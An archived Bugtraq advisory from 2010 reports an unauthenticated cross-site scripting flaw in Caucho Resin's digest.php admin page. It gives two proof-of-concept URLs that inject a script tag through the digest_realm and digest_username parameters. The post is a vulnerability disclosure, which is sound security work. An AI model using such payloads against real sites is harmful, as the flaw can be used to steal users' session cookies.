Home page logo
/

bugtraq logo Bugtraq mailing list archives

Caucho Technology Resin digest.php Cross Site Scripting Vulnerability
From: xuanmumu () gmail com
Date: 18 May 2010 23:18:12 -0000

This vulnerability do not need to login.digest.php use the REQUEST method in a wrong way to accept 
parameters,the malicious user could submit xss code on this page and an attacker could use this vulnerability to 
steal the victim's cookie-based authentication credentials.

exp:

http://test.com/resin-admin/digest.php?digest_attempt=1&digest_realm=";><script>alert("ZnVjayBjbnZk")</script><a&digest_username[]=
http://test.com/resin-admin/digest.php?digest_attempt=1&digest_username=";><script>alert("ZnVjayBjbnZk")</script><a

Test on Resin Professional 3.1.5


  By Date           By Thread  

Current thread:
  • Caucho Technology Resin digest.php Cross Site Scripting Vulnerability xuanmumu (May 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]